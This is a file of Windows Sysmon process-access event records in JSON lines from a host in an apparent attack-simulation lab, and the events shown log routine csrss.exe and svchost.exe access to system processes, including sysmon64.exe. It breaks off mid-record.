{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5486,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-001058930A00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-001058930A00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5487,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5488,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5489,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5490,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5491,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5492,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5493,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5494,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 